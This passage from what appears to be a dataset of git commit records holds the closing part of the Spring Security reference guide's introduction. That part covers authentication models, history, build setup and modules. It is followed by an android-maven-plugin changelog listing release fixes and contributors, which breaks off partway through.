you're not using Spring for developing enterprise applications, we warmly encourage you to take a closer look at it.\nSome familiarity with Spring - and in particular dependency injection principles - will help you get up to speed with Spring Security more easily.\n\nPeople use Spring Security for many reasons, but most are drawn to the project after finding the security features of Java EE's Servlet Specification or EJB Specification lack the depth required for typical enterprise application scenarios.\nWhilst mentioning these standards, it's important to recognise that they are not portable at a WAR or EAR level.\nTherefore, if you switch server environments, it is typically a lot of work to reconfigure your application's security in the new target environment.\nUsing Spring Security overcomes these problems, and also brings you dozens of other useful, customisable security features.\n\nAs you probably know two major areas of application security are \"authentication\" and \"authorization\" (or \"access-control\").\nThese are the two main areas that Spring Security targets.\n\"Authentication\" is the process of establishing a principal is who they claim to be (a \"principal\" generally means a user, device or some other system which can perform an action in your application).\n\"Authorization\" refers to the process of deciding whether a principal is allowed to perform an action within your application.\nTo arrive at the point where an authorization decision is needed, the identity of the principal has already been established by the authentication process.\nThese concepts are common, and not at all specific to Spring Security.\n\nAt an authentication level, Spring Security supports a wide range of authentication models.\nMost of these authentication models are either provided by third parties, or are developed by relevant standards bodies such as the Internet Engineering Task Force.\nIn addition, Spring Security provides its own set of authentication features.\nSpecifically, Spring Security currently supports authentication integration with all of these technologies:\n\n\n* HTTP BASIC authentication headers (an IETF RFC-based standard)\n\n* HTTP Digest authentication headers (an IETF RFC-based standard)\n\n* HTTP X.509 client certificate exchange (an IETF RFC-based standard)\n\n* LDAP (a very common approach to cross-platform authentication needs, especially in large environments)\n\n* Form-based authentication (for simple user interface needs)\n\n* OpenID authentication\n\n* Authentication based on pre-established request headers (such as Computer Associates Siteminder)\n\n* Jasig Central Authentication Service (otherwise known as CAS, which is a popular open source single sign-on system)\n\n* Transparent authentication context propagation for Remote Method Invocation (RMI) and HttpInvoker (a Spring remoting protocol)\n\n* Automatic \"remember-me\" authentication (so you can tick a box to avoid re-authentication for a predetermined period of time)\n\n* Anonymous authentication (allowing every unauthenticated call to automatically assume a particular security identity)\n\n* Run-as authentication (which is useful if one call should proceed with a different security identity)\n\n* Java Authentication and Authorization Service (JAAS)\n\n* Java EE container authentication (so you can still use Container Managed Authentication if desired)\n\n* Kerberos\n\n* Java Open Source Single Sign-On (JOSSO) *\n\n* OpenNMS Network Management Platform *\n\n* AppFuse *\n\n* AndroMDA *\n\n* Mule ESB *\n\n* Direct Web Request (DWR) *\n\n* Grails *\n\n* Tapestry *\n\n* JTrac *\n\n* Jasypt *\n\n* Roller *\n\n* Elastic Path *\n\n* Atlassian Crowd *\n\n* Your own authentication systems (see below)\n\n\n\n(* Denotes provided by a third party)\n\nMany independent software vendors (ISVs) adopt Spring Security because of this significant choice of flexible authentication models.\nDoing so allows them to quickly integrate their solutions with whatever their end clients need, without undertaking a lot of engineering or requiring the client to change their environment.\nIf none of the above authentication mechanisms suit your needs, Spring Security is an open platform and it is quite simple to write your own authentication mechanism.\nMany corporate users of Spring Security need to integrate with \"legacy\" systems that don't follow any particular security standards, and Spring Security is happy to \"play nicely\" with such systems.\n\nIrrespective of the authentication mechanism, Spring Security provides a deep set of authorization capabilities.\nThere are three main areas of interest: authorizing web requests, authorizing whether methods can be invoked and authorizing access to individual domain object instances.\nTo help you understand the differences, consider the authorization capabilities found in the Servlet Specification web pattern security, EJB Container Managed Security and file system security respectively.\nSpring Security provides deep capabilities in all of these important areas, which we'll explore later in this reference guide.\n\n\n[[history]]\n=== History\nSpring Security began in late 2003 as \"The Acegi Security System for Spring\".\nA question was posed on the Spring Developers' mailing list asking whether there had been any consideration given to a Spring-based security implementation.\nAt the time the Spring community was relatively small (especially compared with the size today!), and indeed Spring itself had only existed as a SourceForge project from early 2003.\nThe response to the question was that it was a worthwhile area, although a lack of time currently prevented its exploration.\n\nWith that in mind, a simple security implementation was built and not released.\nA few weeks later another member of the Spring community inquired about security, and at the time this code was offered to them.\nSeveral other requests followed, and by January 2004 around twenty people were using the code.\nThese pioneering users were joined by others who suggested a SourceForge project was in order, which was duly established in March 2004.\n\nIn those early days, the project didn't have any of its own authentication modules.\nContainer Managed Security was relied upon for the authentication process, with Acegi Security instead focusing on authorization.\nThis was suitable at first, but as more and more users requested additional container support, the fundamental limitation of container-specific authentication realm interfaces became clear.\nThere was also a related issue of adding new JARs to the container's classpath, which was a common source of end user confusion and misconfiguration.\n\nAcegi Security-specific authentication services were subsequently introduced.\nAround a year later, Acegi Security became an official Spring Framework subproject.\nThe 1.\n0.\n0 final release was published in May 2006 - after more than two and a half years of active use in numerous production software projects and many hundreds of improvements and community contributions.\n\nAcegi Security became an official Spring Portfolio project towards the end of 2007 and was rebranded as \"Spring Security\".\n\nToday Spring Security enjoys a strong and active open source community.\nThere are thousands of messages about Spring Security on the support forums.\nThere is an active core of developers who work on the code itself and an active community which also regularly share patches and support their peers.\n\n\n[[release-numbering]]\n=== Release Numbering\nIt is useful to understand how Spring Security release numbers work, as it will help you identify the effort (or lack thereof) involved in migrating to future releases of the project.\nEach release uses a standard triplet of integers: MAJOR.MINOR.PATCH.\nThe intent is that MAJOR versions are incompatible, large-scale upgrades of the API.\nMINOR versions should largely retain source and binary compatibility with older minor versions, thought there may be some design changes and incompatible updates.\nPATCH level should be perfectly compatible, forwards and backwards, with the possible exception of changes which are to fix bugs and defects.\n\nThe extent to which you are affected by changes will depend on how tightly integrated your code is.\nIf you are doing a lot of customization you are more likely to be affected than if you are using a simple namespace configuration.\n\nYou should always test your application thoroughly before rolling out a new version.\n\n\n[[get-spring-security]]\n=== Getting Spring Security\nYou can get hold of Spring Security in several ways.\nYou can download a packaged distribution from the main http:\/\/spring.\nio\/spring-security[Spring Security] page, download individual jars from the Maven Central repository (or a Spring Maven repository for snapshot and milestone releases) or, alternatively, you can build the project from source yourself.\n\n[[maven]]\n==== Usage with Maven\n\nA minimal Spring Security Maven set of dependencies typically looks like the following:\n\n.pom.xml\n[source,xml]\n[subs=\"verbatim,attributes\"]\n----\n<dependencies>\n<!-- ... other dependency elements ... -->\n<dependency>\n\t<groupId>org.springframework.security<\/groupId>\n\t<artifactId>spring-security-web<\/artifactId>\n\t<version>{spring-security-version}<\/version>\n<\/dependency>\n<dependency>\n\t<groupId>org.springframework.security<\/groupId>\n\t<artifactId>spring-security-config<\/artifactId>\n\t<version>{spring-security-version}<\/version>\n<\/dependency>\n<\/dependencies>\n----\n\nIf you are using additional features like LDAP, OpenID, etc. you will need to also include the appropriate <<modules>>.\n\n[[maven-repositories]]\n===== Maven Repositories\nAll GA releases (i.e. versions ending in .RELEASE) are deployed to Maven Central, so no additional Maven repositories need to be declared in your pom.\n\nIf you are using a SNAPSHOT version, you will need to ensure you have the Spring Snapshot repository defined as shown below:\n\n.pom.xml\n[source,xml]\n----\n<repositories>\n<!-- ... possibly other repository elements ... -->\n<repository>\n\t<id>spring-snapshot<\/id>\n\t<name>Spring Snapshot Repository<\/name>\n\t<url>http:\/\/repo.spring.io\/snapshot<\/url>\n<\/repository>\n<\/repositories>\n----\n\nIf you are using a milestone or release candidate version, you will need to ensure you have the Spring Milestone repository defined as shown below:\n\n.pom.xml\n[source,xml]\n----\n<repositories>\n<!-- ... possibly other repository elements ... -->\n<repository>\n\t<id>spring-milestone<\/id>\n\t<name>Spring Milestone Repository<\/name>\n\t<url>http:\/\/repo.spring.io\/milestone<\/url>\n<\/repository>\n<\/repositories>\n----\n\n[[maven-bom]]\n===== Spring Framework Bom\n\nSpring Security builds against Spring Framework {spring-version}, but should work with 4.0.x.\nThe problem that many users will have is that Spring Security's transitive dependencies resolve Spring Framework {spring-version} which can cause strange classpath problems.\n\nOne (tedious) way to circumvent this issue would be to include all the Spring Framework modules in a http:\/\/maven.apache.org\/guides\/introduction\/introduction-to-dependency-mechanism.html#Dependency_Management[<dependencyManagement>] section of your pom.\nAn alternative approach is to include the `spring-framework-bom` within your `<dependencyManagement>` section of your `pom.xml` as shown below:\n\n.pom.xml\n[source,xml]\n[subs=\"verbatim,attributes\"]\n----\n<dependencyManagement>\n\t<dependencies>\n\t<dependency>\n\t\t<groupId>org.springframework<\/groupId>\n\t\t<artifactId>spring-framework-bom<\/artifactId>\n\t\t<version>{spring-version}<\/version>\n\t\t<type>pom<\/type>\n\t\t<scope>import<\/scope>\n\t<\/dependency>\n\t<\/dependencies>\n<\/dependencyManagement>\n----\n\nThis will ensure that all the transitive dependencies of Spring Security use the Spring {spring-version} modules.\n\nNOTE: This approach uses Maven's \"bill of materials\" (BOM) concept and is only available in Maven 2.0.9+.\nFor additional details about how dependencies are resolved refer to http:\/\/maven.apache.org\/guides\/introduction\/introduction-to-dependency-mechanism.html[Maven's Introduction to the Dependency Mechanism documentation].\n\n[[gradle]]\n==== Gradle\nA minimal Spring Security Gradle set of dependencies typically looks like the following:\n\n.build.gradle\n[source,groovy]\n[subs=\"verbatim,attributes\"]\n----\ndependencies {\n\tcompile 'org.springframework.security:spring-security-web:{spring-security-version}'\n\tcompile 'org.springframework.security:spring-security-config:{spring-security-version}'\n}\n----\n\nIf you are using additional features like LDAP, OpenID, etc. you will need to also include the appropriate <<modules>>.\n\n[[gradle-repositories]]\n===== Gradle Repositories\nAll GA releases (i.e. versions ending in .RELEASE) are deployed to Maven Central, so using the mavenCentral() repository is sufficient for GA releases.\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmavenCentral()\n}\n----\n\nIf you are using a SNAPSHOT version, you will need to ensure you have the Spring Snapshot repository defined as shown below:\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmaven { url 'https:\/\/repo.spring.io\/snapshot' }\n}\n----\n\nIf you are using a milestone or release candidate version, you will need to ensure you have the Spring Milestone repository defined as shown below:\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmaven { url 'https:\/\/repo.spring.io\/milestone' }\n}\n----\n\n[[gradle-resolutionStrategy]]\n===== Using Spring 4.0.x and Gradle\n\nBy default Gradle will use the newest version when resolving transitive versions.\nThis means that often times no additional work is necessary when running Spring Security {spring-security-version} with Spring Framework {spring-version}.\nHowever, at times there can be issues that come up so it is best to mitigate this using http:\/\/www.gradle.org\/docs\/current\/dsl\/org.gradle.api.artifacts.ResolutionStrategy.html[Gradle's ResolutionStrategy] as shown below:\n\n.build.gradle\n[source,groovy]\n[subs=\"verbatim,attributes\"]\n----\nconfigurations.all {\n\tresolutionStrategy.eachDependency { DependencyResolveDetails details ->\n\t\tif (details.requested.group == 'org.springframework') {\n\t\t\tdetails.useVersion '{spring-version}'\n\t\t}\n\t}\n}\n----\n\nThis will ensure that all the transitive dependencies of Spring Security use the Spring {spring-version} modules.\n\nNOTE: This example uses Gradle 1.9, but may need modifications to work in future versions of Gradle since this is an incubating feature within Gradle.\n\n[[modules]]\n==== Project Modules\nIn Spring Security 3.0, the codebase has been sub-divided into separate jars which more clearly separate different functionality areas and third-party dependencies.\nIf you are using Maven to build your project, then these are the modules you will add to your `pom.xml`.\nEven if you're not using Maven, we'd recommend that you consult the `pom.xml` files to get an idea of third-party dependencies and versions.\nAlternatively, a good idea is to examine the libraries that are included in the sample applications.\n\n\n[[spring-security-core]]\n===== Core - spring-security-core.jar\nContains core authentication and access-contol classes and interfaces, remoting support and basic provisioning APIs.\nRequired by any application which uses Spring Security.\nSupports standalone applications, remote clients, method (service layer) security and JDBC user provisioning.\nContains the top-level packages:\n\n* `org.springframework.security.core`\n\n* `org.springframework.security.access`\n\n* `org.springframework.security.authentication`\n\n* `org.springframework.security.provisioning`\n\n\n\n\n\n[[spring-security-remoting]]\n===== Remoting - spring-security-remoting.jar\nProvides intergration with Spring Remoting.\nYou don't need this unless you are writing a remote client which uses Spring Remoting.\nThe main package is `org.springframework.security.remoting`.\n\n\n[[spring-security-web]]\n===== Web - spring-security-web.jar\nContains filters and related web-security infrastructure code.\nAnything with a servlet API dependency.\nYou'll need it if you require Spring Security web authentication services and URL-based access-control.\nThe main package is `org.springframework.security.web`.\n\n\n[[spring-security-config]]\n===== Config - spring-security-config.jar\nContains the security namespace parsing code & Java configuration code.\nYou need it if you are using the Spring Security XML namespace for configuration or Spring Security's Java Configuration support.\nThe main package is `org.springframework.security.config`.\nNone of the classes are intended for direct use in an application.\n\n\n[[spring-security-ldap]]\n===== LDAP - spring-security-ldap.jar\nLDAP authentication and provisioning code.\nRequired if you need to use LDAP authentication or manage LDAP user entries.\nThe top-level package is `org.springframework.security.ldap`.\n\n\n[[spring-security-oauth2-core]]\n===== OAuth 2.0 Core - spring-security-oauth2-core.jar\n`spring-security-oauth2-core.jar` contains core classes and interfaces that provide support for the _OAuth 2.0 Authorization Framework_ and for _OpenID Connect Core 1.0_.\nIt is required by applications that use _OAuth 2.0_ or _OpenID Connect Core 1.0_, such as Client, Resource Server, and Authorization Server.\nThe top-level package is `org.springframework.security.oauth2.core`.\n\n\n[[spring-security-oauth2-client]]\n===== OAuth 2.0 Client - spring-security-oauth2-client.jar\n`spring-security-oauth2-client.jar` is Spring Security's client support for _OAuth 2.0 Authorization Framework_ and _OpenID Connect Core 1.0_.\nRequired by applications leveraging *OAuth 2.0 Login* and\/or OAuth Client support.\nThe top-level package is `org.springframework.security.oauth2.client`.\n\n\n[[spring-security-oauth2-jose]]\n===== OAuth 2.0 JOSE - spring-security-oauth2-jose.jar\n`spring-security-oauth2-jose.jar` contains Spring Security's support for the _JOSE_ (Javascript Object Signing and Encryption) framework.\nThe _JOSE_ framework is intended to provide a method to securely transfer claims between parties.\nIt is built from a collection of specifications:\n\n* JSON Web Token (JWT)\n* JSON Web Signature (JWS)\n* JSON Web Encryption (JWE)\n* JSON Web Key (JWK)\n\nIt contains the top-level packages:\n\n* `org.springframework.security.oauth2.jwt`\n* `org.springframework.security.oauth2.jose`\n\n\n[[spring-security-acl]]\n===== ACL - spring-security-acl.jar\nSpecialized domain object ACL implementation.\nUsed to apply security to specific domain object instances within your application.\nThe top-level package is `org.springframework.security.acls`.\n\n\n[[spring-security-cas]]\n===== CAS - spring-security-cas.jar\nSpring Security's CAS client integration.\nIf you want to use Spring Security web authentication with a CAS single sign-on server.\nThe top-level package is `org.springframework.security.cas`.\n\n\n[[spring-security-openid]]\n===== OpenID - spring-security-openid.jar\nOpenID web authentication support.\nUsed to authenticate users against an external OpenID server.\n`org.springframework.security.openid`.\nRequires OpenID4Java.\n\n\n[[spring-security-test]]\n===== Test - spring-security-test.jar\nSupport for testing with Spring Security.\n\n\n[[get-source]]\n==== Checking out the Source\nSince Spring Security is an Open Source project, we'd strongly encourage you to check out the source code using git.\nThis will give you full access to all the sample applications and you can build the most up to date version of the project easily.\nHaving the source for a project is also a huge help in debugging.\nException stack traces are no longer obscure black-box issues but you can get straight to the line that's causing the problem and work out what's happening.\nThe source is the ultimate documentation for a project and often the simplest place to find out how something actually works.\n\nTo obtain the source for the project, use the following git command:\n\n[source,txt]\n----\ngit clone https:\/\/github.com\/spring-projects\/spring-security.git\n----\n\nThis will give you access to the entire project history (including all releases and branches) on your local machine.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e06ee13a713a00e60c14cfbf8394743ee0a684e3","subject":"PR#660","message":"PR#660","repos":"CJstar\/android-maven-plugin,b-cuts\/android-maven-plugin,secondsun\/maven-android-plugin,Cha0sX\/android-maven-plugin,xiaojiaqiao\/android-maven-plugin,secondsun\/maven-android-plugin,ashutoshbhide\/android-maven-plugin,WonderCsabo\/maven-android-plugin,simpligility\/android-maven-plugin,greek1979\/maven-android-plugin,xiaojiaqiao\/android-maven-plugin,WonderCsabo\/maven-android-plugin,Cha0sX\/android-maven-plugin,hgl888\/android-maven-plugin,Stuey86\/android-maven-plugin,repanda\/android-maven-plugin,ashutoshbhide\/android-maven-plugin,mitchhentges\/android-maven-plugin,xieningtao\/android-maven-plugin,Cha0sX\/android-maven-plugin,greek1979\/maven-android-plugin,mitchhentges\/android-maven-plugin,hgl888\/android-maven-plugin,b-cuts\/android-maven-plugin,xiaojiaqiao\/android-maven-plugin,secondsun\/maven-android-plugin,Stuey86\/android-maven-plugin,xieningtao\/android-maven-plugin,repanda\/android-maven-plugin,CJstar\/android-maven-plugin","old_file":"src\/site\/asciidoc\/changelog.adoc","new_file":"src\/site\/asciidoc\/changelog.adoc","new_contents":"= Changelog\n\n== 4.3.1 or higher - upcoming \n\n* Make manifest merging less verbose\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/650\n** contributed by Nathan Toone https:\/\/github.com\/Toonetown\n* Fix building with debug mode and raw file directories\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/649\n** contributed by Nathan Toone https:\/\/github.com\/Toonetown\n* Fix continuous integration(use Travis Android support and enable\/update ITs)\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/641\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Fix issue in which dudplicate files were added to the APK\n** https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/661\n** contributed by Andrew Bowley https:\/\/github.com\/andrew-bowley\n\nPlanned changes:\n\n* migrate more tests to be instrumentation tests with example projects\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/452\n* anything else contributed by the community\n\n== 4.3.0 - released 2015-06-15 \n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/FB4mP5s1kvA\/EFxbrnnbca0J[Release Announcement Post]\n\n* Fixed processing of duplicate resources from dependencies\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/614\n** contributed by Marek Kedzierski https:\/\/github.com\/kedzie\n* Ability to choose the build tools version\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/637\n** Contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Added x86_64 and mips64 architectures to NDK support\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/634\n** Contributed by Marek Kedzierski http:\/\/kedzie.github.io\/\n* Migrated rest of the Google Code project content into site content\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n* Plugin updates\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n\n== 4.2.1 - released 2015-05-07\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/HOIC3b7MmoA\/Z8XUXpsmT-EJ[Release Announcement Post]\n\n* Refactored code base to com.simpligility to follow groupId\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n* Fixed NPE for undefined versionNamingPattern in ManifestMojo\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/622\n** Contributed by Leonid https:\/\/github.com\/greek1979\n* Fixed Error generating BuildConfig (ZipException: zip file is empty) if one of the dependent AARs has an empty classes.zip\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/626\n** Contributed by William Ferguson https:\/\/github.com\/william-ferguson-au\n* Updated Android SDK libraries 1.2.2 \/ 24.2.2\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Support for Junit4 Test Runner based tests\n** Usage requires deployment of Android SDK supplied Maven repositories to the\n local repository e.g. with Maven Android SDK Deployer\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/625\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/623\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/617\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n\n== 4.2.0 - released 2015-04-15\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/-HhJutxX0u8\/PAKA2dYDK2wJ[Release Announcement Post]\n\n* Include internal jars from aar libraries by default\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/586#issuecomment-74931486\n* Don't include internal libs from transitive AAR deps into an AAR\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/589\n** contributed by Philip Schiffer https:\/\/github.com\/hameno\n* Better doco for destinationAndroidManifest parameter\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/594\n** contributed by Matthias Stevens https:\/\/github.com\/mstevens83\n* Project META-INF artifacts are included in APK\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/602\n** Contributed by Marek Marek Kedzierski https:\/\/github.com\/kedzie\n* Support for specifying debug port - automatically forward JDWP connection\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/584\n** and follow up commits\n** contributed by Jaroslav Tulach https:\/\/github.com\/jtulach\n** and Manfred Moser http:\/\/www.simpligility.com\n* Configurable encoding for publish mojo listing files\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/603\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/601\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Checkstyle - removed deprecated check\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/609\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Add NDK support for arm64-v8a APP_ABI \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/574\n** contributed by https:\/\/github.com\/arnaud-soulard\n* Log warning about using dependencies conflicting with packaged libraries in android jar \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/610\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Allow AAR provided proguard configuration to be automatically integrated\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/612\n** contributed by Philip Schiffer https:\/\/github.com\/hameno\n* Updated Android SDK libraries 1.1.3 \/ 24.1.3\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/commit\/60ec75aa8ab889c7033fd403149973c0d3b66f82\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/commit\/869578d84af1f215bca341191bb0078899e3330c\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Regex support for VersionGenerator\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/605\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/606\n** contributed by Wang Xuerui https:\/\/github.com\/xen0n\n\n== 4.1.1 or higher - released 2015-02-02\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/EXYhXO1hbwM\/L2mS3Ho7-kQJ[Release Announcement Post]\n\n* Added Manifest Merger v2 example (tictactoe) & Deprecated merge manifest v1\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/560\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Added proguard support from library (AAR) projects\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/559\n** contributed by David Sobreira Marques https:\/\/github.com\/dpsm\n* Updated Takari lifecyle and integration testing setup to new releases\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/564\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n** and Igor Fedorenko https:\/\/github.com\/ifedorenko\n** sponsored by Takari http:\/\/takari.io\/\n* Fix to allow both release-plugin and IDEs to correctly consume AAR deps.\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/565\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n* Change default value for aidlSourceDirectory to src\/main\/aidl\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/555\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/557\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Documentation updates for the site rendering\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/567\n** and other commits\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Corrected unpackedLibsFolder default value\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/575\n** contributed by Pappy Stanescu https:\/\/github.com\/pa314159\n* Improvement of versionCode generator\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/570\n** contributed by Pappy Stanescu https:\/\/github.com\/pa314159\n\n== 4.1.0 - released 2015-01-08\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/oNm46DqGi2Q\/Gs3cQAQ018gJ[Release Announcement Post]\n\n* Updated to Android SDK libraries 1.0.0 \/ 24.0.0\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/531\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Use lint from Android SDK libraries rather than command line invocation\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/528\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/400\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/357\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/476\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Making unpacked-libs folder configurable\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/538\n** contributed by William Ferguson https:\/\/github.com\/william-ferguson-au\n* Added deprecation for APKLIB format\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/543\n* Use the Google Play Developer API to upload APKs and update the store listing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/534\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/418\n** contributed by Joris de Groot https:\/\/github.com\/jdegroot\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Improvements to project site including github ribbon and more\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/544\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Added Manifest Merger V2 and deprecated Manifest-Update mojo\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/539\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/519\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Refactor the 3 parameters used for the androidManifest.xml into 2 params \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/542\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/508\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Fixed broken undeploy mojo AndroidManifest parsing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/550\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* MultiDex improvement - generating mainDexClasses when multiDex flag set to true and mainDexList is null\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/526\n** contributed by Piotr Sor\u00f3bka https:\/\/github.com\/psorobka\n* A whole bunch minor project improvements and fixes\n** see commit history\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n\nATTENTION:\n\n* updatedManifestFile & sourceManifestFile parameters have been removed.\n* use androidManifestFile and destinationManifestFile\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/542\n\n\n== 4.0.0 - released 2014-11-25\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/9ogkKf0Xr7Y\/F9CKX6LV0uAJ[Release Announcement Post]\n\n* Migrated some documentation from the old Google Code site\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Fix for aar and jar dependency mix and related resolving\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/493\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/485\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n* Fixes to proguard and multidex related processing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/509\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/507\n** contributed by \u0141ukasz Suski https:\/\/github.com\/lsuski\n* Documentation for shading commons-codec to allow usage of newer version\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/498\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/487#issuecomment-60956025\n** contributed by Matthias Stevens https:\/\/github.com\/mstevens83\n* Custom exclude filter to ProGuardMojo\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/497\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Fixes to resource files in sample projects to allow builds to pass with new SDK\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/514\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Always honor dexArguments parameters\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/517\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Downgraded runtime requirements to Maven 3.0.4\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Examples documentation\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Moved Emma analysis to process-classes phase\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/489\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/515\n** contributed by Dmitry Berezhnoy https:\/\/github.com\/deadmoto\n\n== 4.0.0-rc.3 - released 2014-10-28\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/9ogkKf0Xr7Y\/F9CKX6LV0uAJ[Release Announcement Post]\n\n* Migrated complete project to new git repo at https:\/\/github.com\/simpligility\/android-maven-plugin\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Adapted codebase to new groupId \"com.simpligility.maven.plugins\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n\n== 4.0.0-rc.2 and older release notes\n\nCan be found in link:changelog-old-3x.html[the migrated changelog] from the old project site.\n","old_contents":"= Changelog\n\n== 4.3.1 or higher - upcoming \n\n* Make manifest merging less verbose\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/650\n** contributed by Nathan Toone https:\/\/github.com\/Toonetown\n* Fix building with debug mode and raw file directories\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/649\n** contributed by Nathan Toone https:\/\/github.com\/Toonetown\n* Fix continuous integration(use Travis Android support and enable\/update ITs)\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/641\n** contributed by Csaba Koz\u00e1k 